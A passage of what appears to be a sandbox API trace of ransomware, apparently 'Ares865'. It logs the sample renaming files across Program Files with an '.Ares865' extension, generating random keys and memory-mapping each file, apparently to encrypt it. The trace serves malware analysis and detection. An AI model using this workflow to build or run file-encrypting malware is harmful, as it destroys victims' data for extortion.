pbBuffer=0x2e2d2c8) returned 1 [0055.398] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.398] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8a0, lpName=0x0) returned 0x120 [0055.400] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8a0) returned 0x190000 [0055.401] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.401] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.401] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.401] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.402] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip.Ares865") returned 114 [0055.402] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip.ares865"), dwFlags=0x1) returned 1 [0055.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Visualizer.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\visualizer.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.403] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1368) returned 1 [0055.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.403] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.404] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.404] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.404] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x860, lpName=0x0) returned 0x120 [0055.405] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x860) returned 0x190000 [0055.406] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.407] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.407] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.407] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.407] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip.Ares865") returned 111 [0055.407] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip.ares865"), dwFlags=0x1) returned 1 [0055.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.409] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=593) returned 1 [0055.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.409] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.409] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.410] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.410] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.410] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x560, lpName=0x0) returned 0x120 [0055.411] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x560) returned 0x190000 [0055.412] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.413] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.413] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.413] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.434] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.434] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528b28a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528b28a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0055.511] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT.Ares865") returned 55 [0055.512] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt.ares865"), dwFlags=0x1) returned 1 [0055.513] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\MST7MDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\mst7mdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.513] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1272) returned 1 [0055.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.514] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.514] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.514] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.515] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x120 [0055.517] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0055.522] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.523] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.523] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.532] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT.Ares865") returned 63 [0055.532] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt.ares865"), dwFlags=0x1) returned 1 [0055.534] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.534] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2288) returned 1 [0055.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.535] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.536] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.536] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.536] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf0, lpName=0x0) returned 0x120 [0055.538] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf0) returned 0x190000 [0055.541] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.542] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.542] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.556] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate.Ares865") returned 61 [0055.557] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate.ares865"), dwFlags=0x1) returned 1 [0055.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Efate.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\efate.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.571] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=233) returned 1 [0055.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.572] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.572] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.572] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.573] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x120 [0055.581] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0055.583] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.584] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.584] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.584] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.585] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan.Ares865") returned 62 [0055.585] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan.ares865"), dwFlags=0x1) returned 1 [0055.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Saipan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\saipan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=77) returned 1 [0055.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.588] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.589] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.589] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.589] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x120 [0055.594] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0055.596] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.596] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.597] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.621] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas.Ares865") returned 64 [0055.621] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas.ares865"), dwFlags=0x1) returned 1 [0055.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.625] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=27) returned 1 [0055.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.625] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.626] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.626] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.626] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x120 [0055.634] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0055.635] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.635] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.635] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.636] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte.Ares865") returned 62 [0055.636] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte.ares865"), dwFlags=0x1) returned 1 [0055.637] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mayotte.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mayotte.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.637] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=65) returned 1 [0055.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.637] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.638] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.638] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.638] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x120 [0055.640] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0055.641] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.641] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.641] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.642] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.651] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade.Ares865") returned 63 [0055.651] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade.ares865"), dwFlags=0x1) returned 1 [0055.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Belgrade.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\belgrade.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0055.652] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1040) returned 1 [0055.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c8f28 [0055.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.653] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.653] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.653] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.654] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x120 [0055.655] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x190000 [0055.657] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.657] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.657] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.657] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.659] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod.Ares865") returned 63 [0055.659] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod.ares865"), dwFlags=0x1) returned 1 [0055.670] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod.Ares865" (normalized: 